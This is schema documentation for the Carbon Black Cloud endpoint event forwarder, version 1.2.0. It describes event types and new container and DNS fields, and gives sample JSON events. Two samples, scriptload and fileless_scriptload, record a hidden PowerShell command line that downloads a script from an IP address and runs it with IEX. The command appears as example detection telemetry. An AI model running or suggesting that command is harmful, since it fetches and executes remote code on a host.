Endpoint Event Schema 1.2.0

The Carbon Black Cloud Endpoint Event Schema has been updated to version 1.2.0!

New in 1.2.0

Apart from the new fields which are marked below, the most notable changes in this release are:

Events from processes within containers now have information about the related container see container_* fields below
Netconn events now report parsed DNS traffic see netconn_dns_* fields below

Which CBC products does this affect?

Customers with the XDR add-on will benefit from the netconn_dns_* field additions
Customers with any CBC product will benefit from the other added fields

Legend

Capabilities

NOT FILTERABLE - Indicates when the field is not supported in the query for a filter. Most fields can be used in filters.
TOKENIZED - The field supports partial phrase matching through Tokenization
ENDPOINT STANDARD - Fields specific to the Endpoint Standard product
ENTERPRISE EDR - Fields specific to the Enterprise EDR product
XDR - Additional fields populated when the XDR feature add on is enabled

Wildcards - All fields support wildcard characters. Tips on filtering and recommended practices are in the Carbon Black Cloud User Guide.

Event Type

The following list contains the event types used in Carbon Black Cloud. You can search by each of these event types in the Fields table below.

COMMON - The Carbon Black Cloud Data Forwarder emits a set of common fields for every endpoint event. These fields represent common metadata for the organization, device, and process to which this event belongs. Some fields are only populated by specific products; this is identified by Capability.
CROSSPROC - Any time a process interacts with another process on the system, that is considered a “cross-process” event. Each cross-process event is reported as the type “endpoint.event.crossproc”.
FILEMOD - Each file-modification event is reported as the type “endpoint.event.filemod”.
FILELESS SCRIPTLOAD - A “fileless script load” is generated when a process loads a set of script instructions into memory. Each fileless script load event is reported as the type “endpoint.event.fileless_scriptload”.
MODULE LOAD - A “module load” is generated when a process loads a shared library (DLL in Windows, .so in Linux, .dylib in macOS) into its process memory space. Each module load event is reported as the type “endpoint.event.moduleload”.
NETCONN - Each network-connection event is reported as the type “endpoint.event.netconn”. See example below.
NETCONN PROXY - A “network proxy connection” event is any network connection event in which the process communicates with an intermediary remote device but has a different intended destination - usually an HTTP proxy intermediary. Each network proxy connection event is reported as the type “endpoint.event.netconn_proxy”.
PROCSTART - Each process launch event is reported as the type “endpoint.event.procstart”. A procstart event can be either a child process or a new process. A child process event will have the action ACTION_CREATE_PROCESS where a new process will have ACTION_PROCESS_DISCOVERED. In the case of a new process you will only have process and childproc properties, there will be no parent properties. The child process properties represent the process being created and the process properties will represent the os system. The target_cmdline property is the command line that was executed to create the process represented in the childproc properties. See example below.
REGMOD - Each registry-modification event is reported as the type “endpoint.event.regmod”.
SCRIPTLOAD - A “script load” is generated when a process loads a script (.ps1, .vb, .bin, etc.) that can be executed by a script interpreter. Each script load event is reported as the type “endpoint.event.scriptload”.

Event Type Examples

endpoint.event.procstart - NGAV - v1.2.0

• Event type: endpoint.event.procstart
• Origin: NGAV
• version: 1.2.0

{
  "type": "endpoint.event.procstart",
  "process_guid": "ABCD1234-006e8d46-00001310-00000000-1d5fd46cc37d700",
  "parent_guid": "ABCD1234-006e8d46-00000290-00000000-1d5fa5dbbaa12ce",
  "backend_timestamp": "2020-03-25 22:38:54 +0000 UTC",
  "org_key": "ABCD1234",
  "device_id": "7245126",
  "device_name": "cbc-win10",
  "device_external_ip": "9.8.7.6",
  "device_os": "WINDOWS",
  "device_group": "Windows Group",
  "action": "ACTION_CREATE_PROCESS",
  "schema": 1,
  "event_description": "The application \"<share><link hash=\"0f407d7194e7955e312b177b16cc409ac89b4d0494c60ce75469fd4c474d4043\">C:\\program files (x86)\\google\\chrome\\application\\chrome.exe</link></share>\" invoked the application \"<share><link hash=\"0f407d7194e7955e312b177b16cc409ac89b4d0494c60ce75469fd4c474d4043\">C:\\program files (x86)\\google\\chrome\\application\\chrome.exe</link></share>\". ",
  "alert_id": "WXYZ0987",
  "event_id": "54885ebc6ee911eabc70416f8358e4f2",
  "device_timestamp": "2020-03-25 22:38:03.353 +0000 UTC",
  "process_terminated": false,
  "process_reputation": "REP_RESOLVING",
  "parent_reputation": "",
  "process_pid": 4880,
  "parent_pid": 656,
  "process_publisher": [
    {
      "name": "Google Inc",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"
    }
  ],
  "process_path": "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe",
  "parent_path": "c:\\windows\\system32\\services.exe",
  "process_hash": [
    "3623a0e7cdcf3310ffb4c87c5b43ae02",
    "0f407d7194e7955e312b177b16cc409ac89b4d0494c60ce75469fd4c474d4043"
  ],
  "parent_hash": [
    "db896369fb58241adf28515e3765c514",
    "a2e369df26c88015fe1f97c7542d6023b5b1e4830c25f94819507ee5bcb1dfcc"
  ],
  "process_cmdline": "\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox",
  "parent_cmdline": "",
  "process_username": "CBC-WIN10\\user",
  "sensor_action": "ALLOW",
  "event_origin": "NGAV",
  "childproc_name": "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe",
  "childproc_hash": [
    "3623a0e7cdcf3310ffb4c87c5b43ae02",
    "0f407d7194e7955e312b177b16cc409ac89b4d0494c60ce75469fd4c474d4043"
  ],
  "target_cmdline": "\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --field-trial-handle=1656,13710686576560040528,13403776044656688818,131072 --lang=en-US --service-sandbox-type=utility --enable-audio-service-sandbox --mojo-platform-channel-handle=5236 --ignored=\" --type=renderer \" /prefetch:8",
  "version": "1.2.0"
}

endpoint.event.netconn - EDR - v1.2.0 with XDR fields

This sample shows XDR fields such as `netconn_community_id` populated.

• Event type: endpoint.event.netconn
• Origin: EDR
• version: 1.2.0

{
  "version": "1.2.0",
  "type": "endpoint.event.netconn",
  "process_guid": "ABCD1234-011df811-00000820-00000000-1da2d773b7d0f2e",
  "parent_guid": "ABCD1234-011df811-000002b4-00000000-1da2d7738407692",
  "backend_timestamp": "2023-12-15 05:58:20 +0000 UTC",
  "org_key": "ABCD1234",
  "device_id": "12345678",
  "device_name": "DEMO-MACHINE",
  "device_external_ip": "1.2.3.4",
  "device_os": "WINDOWS",
  "action": "ACTION_CONNECTION_CREATE",
  "schema": 1,
  "device_timestamp": "2023-12-15 05:56:16.0222142 +0000 UTC",
  "process_terminated": false,
  "process_reputation": "REP_WHITE",
  "parent_reputation": "REP_WHITE",
  "process_pid": 2080,
  "parent_pid": 692,
  "process_publisher": [
    {
      "name": "Microsoft Windows Publisher",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS"
    }
  ],
  "process_path": "c:\\windows\\system32\\svchost.exe",
  "parent_path": "c:\\windows\\system32\\services.exe",
  "process_hash": [
    "145dcf6706eeea5b066885ee17964c09",
    "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3"
  ],
  "parent_hash": [
    "e606e7e0d5e94af8222715a24df0776b",
    "43ec773e0ec626bf6d8a7fd04e64dc36afa6801444a3c36ef4da2a909fa0d83f"
  ],
  "process_cmdline": "C:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache",
  "parent_cmdline": "C:\\WINDOWS\\system32\\services.exe",
  "process_username": "NT AUTHORITY\\NETWORK SERVICE",
  "sensor_action": "ACTION_ALLOW",
  "event_origin": "EDR",
  "remote_port": 5353,
  "remote_ip": "9.8.7.6",
  "local_port": 5353,
  "local_ip": "4.5.6.7",
  "netconn_inbound": true,
  "netconn_protocol": "PROTO_UDP",
  "netconn_community_id": "1:PYzPIo/Fb8XKxwx1HmwapOPOMr4="
}

endpoint.event.moduleload - EDR - v1.2.0

• Event type: endpoint.event.moduleload
• Origin: EDR
• version: 1.2.0

{
  "version": "1.2.0",
  "type": "endpoint.event.moduleload",
  "process_guid": "ABCD1234-0120b1e3-00001e78-00000000-1da2f2349b8c999",
  "parent_guid": "ABCD1234-0120b1e3-000002e8-00000000-1da2d8f7a6c44d1",
  "backend_timestamp": "2023-12-15 06:59:39 +0000 UTC",
  "org_key": "ABCD1234",
  "device_id": "18919907",
  "device_name": "DEMO-DEVICE",
  "device_external_ip": "9.8.7.6",
  "device_os": "WINDOWS",
  "action": "ACTION_LOAD_MODULE",
  "schema": 1,
  "device_timestamp": "2023-12-15 06:52:36.8474656 +0000 UTC",
  "process_terminated": false,
  "process_reputation": "REP_WHITE",
  "parent_reputation": "REP_WHITE",
  "process_pid": 7800,
  "parent_pid": 744,
  "process_publisher": [
    {
      "name": "Microsoft Windows Publisher",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS"
    }
  ],
  "process_path": "c:\\windows\\system32\\svchost.exe",
  "parent_path": "c:\\windows\\system32\\services.exe",
  "process_hash": [
    "145dcf6706eeea5b066885ee17964c09",
    "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3"
  ],
  "parent_hash": [
    "e606e7e0d5e94af8222715a24df0776b",
    "43ec773e0ec626bf6d8a7fd04e64dc36afa6801444a3c36ef4da2a909fa0d83f"
  ],
  "process_cmdline": "C:\\WINDOWS\\system32\\svchost.exe -k wsappx -p -s AppXSvc",
  "parent_cmdline": "C:\\WINDOWS\\system32\\services.exe",
  "process_username": "NT AUTHORITY\\SYSTEM",
  "sensor_action": "ACTION_ALLOW",
  "event_origin": "EDR",
  "modload_name": "c:\\windows\\system32\\appxdeploymentserver.dll",
  "modload_count": 0,
  "modload_effective_reputation": "REP_ADAPTIVE",
  "modload_hash": [
    "5f6d81c3912a99a429c45dd0ef45b9aa",
    "6f02ff703ebee246c21d306ad72710406029b544e38271916165abf0b7ce4532"
  ],
  "modload_md5": "5f6d81c3912a99a429c45dd0ef45b9aa",
  "modload_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"
    }
  ],
  "modload_sha256": "6f02ff703ebee246c21d306ad72710406029b544e38271916165abf0b7ce4532"
}

endpoint.event.filemod - EDR - v1.2.0 with container fields

• Event type: endpoint.event.filemod
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "ip-172-31-2-92",
  "device_external_ip": "54.145.222.164",
  "process_path": "/bin/busybox",
  "parent_path": "/bin/busybox",
  "process_cmdline": "sh",
  "process_username": "root",
  "filemod_name": "/root/.ash_history",
  "type": "endpoint.event.filemod",
  "process_guid": "ABCD1234-031397af-00000b75-00000000-1dbb9e3ed31a1eb",
  "backend_timestamp": "2025-04-30 15:25:53 +0000 UTC",
  "device_id": "51615663",
  "device_os": "LINUX",
  "action": "ACTION_FILE_LAST_WRITE",
  "schema": 1,
  "event_origin": "EDR",
  "event_id": "4D3A1ED5-D625-F011-9DAA-0AFFF393FB5F",
  "device_timestamp": "2025-04-30 15:24:13.833234 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 2933,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "ABCD1234-031397af-00000b75-00000000-1dbb9e3ed315a67",
  "process_pid": 2933,
  "process_terminated": false,
  "process_reputation": "REP_RESOLVING",
  "version": "1.2.0",
  "process_user_id": "0",
  "container_id": "cca14ff12a97553488436e88b7334936504dc669a2ae9d278fc6e0ac41a67305",
  "container_name": "gracious_williamson",
  "container_cgroup": "/system.slice/docker-cca14ff12a97553488436e88b7334936504dc669a2ae9d278fc6e0ac41a67305.scope",
  "container_image_hash": "78b0ef41dda7c7c925aa282afa800f2b5eaa8ebad95cfcc1197b3e8846ec7be7",
  "container_image_name": "alpine/curl:latest"
}

endpoint.event.crossproc - EDR - v1.2.0

• Event type: endpoint.event.crossproc
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "pscr-test-01-1677785033.788122-22",
  "device_external_ip": "34.145.18.128",
  "process_path": "cmd.exe",
  "process_cmdline": "cmd.exe /c InfDefaultInstall.exe C:\\Users\\bit9qa\\AtomicRedTeam\\atomic-red-team-vmware-develop\\atomics\\T1218\\src\\Infdefaultinstall.inf",
  "process_username": "NT AUTHORITY\\SYSTEM",
  "target_cmdline": "c:\\program files (x86)\\moravec\\sample-44380.exe \\qwer sample -olasdjf",
  "type": "endpoint.event.crossproc",
  "process_guid": "ABCD1234-01147620-002eaa08-00000000-19db1ded53e8000",
  "backend_timestamp": "2025-04-24 16:06:24 +0000 UTC",
  "device_id": "18118176",
  "device_os": "WINDOWS",
  "action": "ACTION_DUP_PROCESS_HANDLE | ACTION_OPEN_THREAD_HANDLE | ACTION_DUP_THREAD_HANDLE",
  "schema": 1,
  "event_origin": "EDR",
  "event_id": "GgVGeGFQSyAJKIHatsTmMjDvnQE48bcBQNoQUAFYBQ==",
  "device_timestamp": "2025-04-24 16:06:24.666502 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "process_pid": 3058184,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Moravec Test Authority",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"
    }
  ],
  "process_hash": [
    "1649ab912edb8d459735fc211d10ae0f",
    "6eb242cc767adacebf6ea858d4dee23b9a24c99d320815726a849d37f63efc2c"
  ],
  "process_reputation": "REP_NOT_LISTED",
  "crossproc_name": "c:\\program files (x86)\\moravec\\sample-44380.exe",
  "crossproc_reputation": "REP_NOT_LISTED",
  "crossproc_target": false,
  "crossproc_guid": "ABCD1234-01147620-000efa2b-00000000-19db1ded53e8000",
  "crossproc_hash": [
    "b86bd7b5bb4c777d0e82e9f9dc3fb7e7",
    "969706072c669123f9718c967d678a26027b0d8448531471afc4de309034be3b"
  ],
  "crossproc_publisher": [
    {
      "name": "Moravec Test Authority",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED"
    }
  ],
  "version": "1.2.0",
  "process_user_id": "S-1-5-18",
  "crossproc_pid": 981547
}

endpoint.event.apicall - NGAV - v1.2.0

• Event type: endpoint.event.apicall
• Origin: NGAV
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "DESKTOP-A80NE1L",
  "device_external_ip": "192.19.176.227",
  "process_path": "c:\\windows\\systemapps\\microsoft.windows.search_cw5n1h2txyewy\\searchapp.exe",
  "parent_path": "c:\\windows\\system32\\svchost.exe",
  "process_cmdline": "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Search_cw5n1h2txyewy\\SearchApp.exe\" -ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca",
  "parent_cmdline": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p",
  "process_username": "DESKTOP-A80NE1L\\username",
  "crossproc_api": "SetWindowsHookEx",
  "target_cmdline": "",
  "type": "endpoint.event.apicall",
  "process_guid": "ABCD1234-031065c3-00000360-00000000-1db9cc872da79a1",
  "backend_timestamp": "2025-03-24 12:25:35 +0000 UTC",
  "device_id": "51406275",
  "device_os": "WINDOWS",
  "action": "ACTION_PROCESS_API_CALL",
  "schema": 1,
  "event_description": "The application c:\\windows\\systemapps\\microsoft.windows.search_cw5n1h2txyewy\\searchapp.exe injected code.",
  "event_origin": "NGAV",
  "event_id": "367572B5-08BB-11F0-A59F-000C29375902",
  "device_timestamp": "2025-03-24 12:24:30.1440262 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 1012,
  "parent_reputation": "REP_WHITE",
  "parent_guid": "ABCD1234-031065c3-000003f4-00000000-1db9cc7fc36957f",
  "parent_hash": [
    "b7f884c1b74a263f746ee12a5f7c9f6a",
    "add683a6910abbbf0e28b557fad0ba998166394932ae2aca069d9aa19ea8fe88"
  ],
  "process_pid": 864,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS"
    }
  ],
  "process_hash": [
    "1f9df012081f0b63dd19ad7efe12016a",
    "e19dfc8606e3fe33e920b91ad84a8343c91a2b855e48b4dd22d435f5cf378d33"
  ],
  "process_reputation": "REP_WHITE",
  "version": "1.2.0",
  "process_integrity_level": 4096,
  "process_privileges": [
    "SeChangeNotifyPrivilege"
  ],
  "process_user_id": "S-1-5-21-2761918040-1928692857-2187293840-1001",
  "device_internal_ip": "172.16.175.138"
}

endpoint.event.fileless_scriptload - EDR - v1.2.0

• Event type: endpoint.event.fileless_scriptload
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "WINVAGR-I636N93",
  "device_external_ip": "207.189.30.110",
  "device_group": "Test group",
  "process_path": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
  "parent_path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
  "process_cmdline": "\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile",
  "parent_cmdline": "powershell.exe  -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.11.216.147:80/a'))\"",
  "process_username": "WINVAGR-I636N93\\username",
  "type": "endpoint.event.fileless_scriptload",
  "process_guid": "ABCD1234-001ae757-0000140c-00000000-1d538d67cc71bb7",
  "backend_timestamp": "2019-07-12 17:31:35 +0000 UTC",
  "device_id": "1763159",
  "device_os": "WINDOWS",
  "action": "ACTION_LOAD_FILELESS_SCRIPT",
  "schema": 1,
  "event_origin": "EDR",
  "device_timestamp": "2019-07-12 17:23:16.5186022 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 7472,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "ABCD1234-001ae757-00001d30-00000000-1d538d67be82563",
  "parent_hash": [
    "95000560239032bc68b4c2fdfcdef913",
    "d3f8fade829d2b7bd596c4504a6dae5c034e789b6a3defbe013bda7d14466677"
  ],
  "process_pid": 5132,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"
    }
  ],
  "process_hash": [
    "dba3e6449e97d4e3df64527ef7012a10",
    "e0c662d10b852b23f2d8a240afc82a72b099519fa71cddf9d5d0f0be08169b6e"
  ],
  "process_reputation": "REP_RESOLVING"
}

endpoint.event.scriptload - EDR - v1.2.0

• Event type: endpoint.event.scriptload
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "WINVAGR-I636N93",
  "device_external_ip": "207.189.30.110",
  "device_group": "Test group",
  "process_path": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
  "parent_path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
  "process_cmdline": "\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile",
  "parent_cmdline": "powershell.exe  -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.11.216.147:80/a'))\"",
  "process_username": "WINVAGR-I636N93\\username",
  "type": "endpoint.event.scriptload",
  "process_guid": "ABCD1234-001ae757-0000140c-00000000-1d538d67cc71bb7",
  "backend_timestamp": "2019-07-12 17:31:35 +0000 UTC",
  "device_id": "1763159",
  "device_os": "WINDOWS",
  "action": "ACTION_LOAD_SCRIPT",
  "schema": 1,
  "event_origin": "EDR",
  "device_timestamp": "2019-07-12 17:23:16.5186022 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 7472,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "ABCD1234-001ae757-00001d30-00000000-1d538d67be82563",
  "parent_hash": [
    "95000560239032bc68b4c2fdfcdef913",
    "d3f8fade829d2b7bd596c4504a6dae5c034e789b6a3defbe013bda7d14466677"
  ],
  "process_pid": 5132,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"
    }
  ],
  "process_hash": [
    "dba3e6449e97d4e3df64527ef7012a10",
    "e0c662d10b852b23f2d8a240afc82a72b099519fa71cddf9d5d0f0be08169b6e"
  ],
  "process_reputation": "REP_RESOLVING",
  "version": "1.2.0"
}

endpoint.event.procend - EDR - v1.2.0

• Event type: endpoint.event.procend
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "VM-ML",
  "device_external_ip": "97.115.126.126",
  "device_group": "Test group",
  "process_path": "c:\\windows\\system32\\backgroundtaskhost.exe",
  "parent_path": "c:\\windows\\system32\\svchost.exe",
  "process_cmdline": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXfg6d6cpsk8dr59w1g58kzt275tb8m991.mca",
  "parent_cmdline": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p",
  "process_username": "VM-ML\\CbUser",
  "target_cmdline": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXfg6d6cpsk8dr59w1g58kzt275tb8m991.mca",
  "type": "endpoint.event.procend",
  "process_guid": "ABCD1234-000c5e2f-00000c14-00000000-1d538d832d4c641",
  "backend_timestamp": "2019-07-12 17:46:41 +0000 UTC",
  "device_id": "810543",
  "device_os": "WINDOWS",
  "action": "ACTION_PROCESS_TERMINATE",
  "schema": 1,
  "event_origin": "EDR",
  "device_timestamp": "2019-07-12 17:36:58.9633715 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 752,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "ABCD1234-000c5e2f-000002f0-00000000-1d538d266b266f1",
  "parent_hash": [
    "8a0a29438052faed8a2532da50455756",
    "7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6"
  ],
  "process_pid": 3092,
  "process_terminated": true,
  "process_duration": 89,
  "process_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS"
    }
  ],
  "process_hash": [
    "50d5fd1290d94d46acca0585311e74d5",
    "b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37"
  ],
  "process_reputation": "REP_RESOLVING",
  "version": "1.2.0",
  "process_user_id": "S-1-5-21-305141222-354209865-1291407277-1001",
  "crossproc_pid": 3092
}

endpoint.event.regmod - EDR - v1.2.0

• Event type: endpoint.event.regmod
• Origin: EDR
• version: 1.2.0

{
  "org_key": "ABCD1234",
  "device_name": "VM-ML",
  "device_external_ip": "97.115.126.126",
  "device_group": "Test group",
  "process_path": "c:\\windows\\system32\\sihost.exe",
  "parent_path": "c:\\windows\\system32\\svchost.exe",
  "process_cmdline": "sihost.exe",
  "parent_cmdline": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p",
  "process_username": "VM-ML\\CbUser",
  "regmod_name": "\\REGISTRY\\A\\{6BE34847-6655-485F-9175-1032A36E7EBE}",
  "type": "endpoint.event.regmod",
  "process_guid": "ABCD1234-000c5e2f-00000c24-00000000-1d538d28467d033",
  "backend_timestamp": "2019-07-12 17:46:41 +0000 UTC",
  "device_id": "810543",
  "device_os": "WINDOWS",
  "action": "ACTION_LOAD_KEY",
  "schema": 1,
  "event_origin": "EDR",
  "device_timestamp": "2019-07-12 17:36:37.0091994 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 1236,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "ABCD1234-000c5e2f-000004d4-00000000-1d538d267ecad56",
  "parent_hash": [
    "8a0a29438052faed8a2532da50455756",
    "7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6"
  ],
  "process_pid": 3108,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Microsoft Windows",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | FILE_SIGNATURE_STATE_CATALOG_SIGNED"
    }
  ],
  "process_hash": [
    "8b6722980e0c5a06312e00bd0565b692",
    "09d94357241ebb37e4510c3a168178822c9458530a30d0e829f5759d6202834d"
  ],
  "process_reputation": "REP_RESOLVING",
  "version": "1.2.0",
  "process_user_id": "S-1-5-21-305141222-354209865-1291407277-1001"
}

endpoint.event.netconn_proxy - EDR - v1.2.0

• Event type: endpoint.event.netconn_proxy
• Origin: EDR
• version: 1.2.0

{
  "org_key": "3X2TKQ82",
  "device_name": "Win10x64v1809",
  "device_external_ip": "144.121.3.50",
  "process_path": "c:\\windows\\system32\\svchost.exe",
  "parent_path": "c:\\windows\\system32\\services.exe",
  "process_cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV",
  "parent_cmdline": "C:\\Windows\\system32\\services.exe",
  "process_username": "NT AUTHORITY\\LOCAL SERVICE",
  "type": "endpoint.event.netconn_proxy",
  "process_guid": "3X2TKQ82-00161d80-00001260-00000000-1d538318f852f72",
  "backend_timestamp": "2019-07-12 16:40:02 +0000 UTC",
  "device_id": "1449344",
  "device_os": "WINDOWS",
  "action": "ACTION_CONNECTION_CREATE",
  "schema": 1,
  "event_origin": "EDR",
  "device_timestamp": "2019-07-12 16:34:08.8615449 +0000 UTC",
  "sensor_action": "ACTION_ALLOW",
  "parent_pid": 680,
  "parent_reputation": "REP_RESOLVING",
  "parent_guid": "3X2TKQ82-00161d80-000002a8-00000000-1d5383180a8c9dc",
  "parent_hash": [
    "7a20da1f1406492a70e9c8243634467b",
    "bf74b5707c2f035da0a348658a60e22c32d0f57340826fc4efcba3b41ea9c8f3"
  ],
  "process_pid": 4704,
  "process_terminated": false,
  "process_publisher": [
    {
      "name": "Microsoft Windows Publisher",
      "state": "FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS"
    }
  ],
  "process_hash": [
    "8a0a29438052faed8a2532da50455756",
    "7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6"
  ],
  "process_reputation": "REP_RESOLVING",
  "remote_port": 80,
  "remote_ip": "100.200.250.50",
  "local_port": 1900,
  "local_ip": "239.255.255.250",
  "netconn_inbound": true,
  "netconn_protocol": "PROTO_UDP",
  "netconn_proxy_ip": "10.210.33.78",
  "netconn_proxy_port": 51584,
  "netconn_proxy_domain": "",
  "version": "1.2.0",
  "process_user_id": "S-1-5-19"
}

New fields

New fields since the previous schema version are denoted with a yellow bar v1.2.0 at the left of the table row. You can easily isolate these by typing 1.2.0 in the Field Name filter box.

Schema

Note: Certain fields that were previously included in this listing, but were never actually populated, have been removed.

Field Name	Definition	Datatype	Capabilities	Event Type



`action`	Specific endpoint action observed by sensor during this event. Enum values vary by event `type`	String		`COMMON`
`alert_id`	The ID of the Alert this event is associated with	String	ENDPOINT STANDARD	`COMMON`
`backend_timestamp`	Time when the backend received the batch of events, based on Carbon Black Cloud backend’s clock as an RFC 3339 formatted time string based on UTC to the seconds; may differ from `device_timestamp` by a few minutes due to asynchronous processing Example: `2021-07-28 18:43:51 +0000 UTC`	ISO 8601 UTC timestamp	NOT FILTERABLE	`COMMON`
`childproc_guid`	Unique ID of the child process. See this document for more information on how a process GUID is used and each of its components.	String	NOT FILTERABLE	`PROCSTART`
`childproc_hash`	Cryptographic hashes of the executable file backing the child process, represented as an array of two elements - MD5 and SHA-256 hash	String[]		`PROCSTART`
`childproc_name`	Full path to the target application for the child process on the device’s local file system	String		`PROCSTART`
`childproc_pid`	OS-reported Process ID of the child process	Integer		`PROCSTART`
`childproc_publisher[].name`	Array with objects of two keys: “name” and “state”. Each array entry is a signature entry for the childproc as reported by the endpoint	String	Filterable field: `childproc_publisher`	`PROCSTART`
`childproc_publisher[].state`	See above	String	Filterable field: `childproc_publisher_state`	`PROCSTART`
`childproc_reputation`	Carbon Black Cloud Reputation string for the childproc.	String		`PROCSTART`
`childproc_username`	The username associated with the user context that the child process was started under	String		`PROCSTART`
1.2.0 `container_cgroup`	A control group on linux that manages resources and which the container must interact with. This field requires Linux sensor version 2.15.0(or higher) and it is only included for processes running inside a container	String
1.2.0 `container_id`	ID of the container. This field requires Linux sensor version 2.15.0(or higher) and it is only included for processes running inside a container	String
1.2.0 `container_image_hash`	SHA-256 hash of the container image This field requires Linux sensor version 2.15.0(or higher) and it is only included for processes running inside a container	String
1.2.0 `container_image_name`	Name of the container image; images are static files with executable code than can create containers. This field requires Linux sensor version 2.15.0(or higher) and it is only included for processes running inside a container	String
1.2.0 `container_name`	Name of the container. Names are typically generated by runtime engines or by platforms such as kubernetes. This field requires Linux sensor version 2.15.0(or higher) and it is only included for processes running inside a container	String
`crossproc_action`	The cross-process action initiated by the actor process `ACTION_API_CALL`, `ACTION_DUP_PROCESS_HANDLE`, `ACTION_OPEN_THREAD_HANDLE`, `ACTION_DUP_THREAD_HANDLE`, `ACTION_CREATE_REMOTE_THREAD`	String		`CROSSPROC`
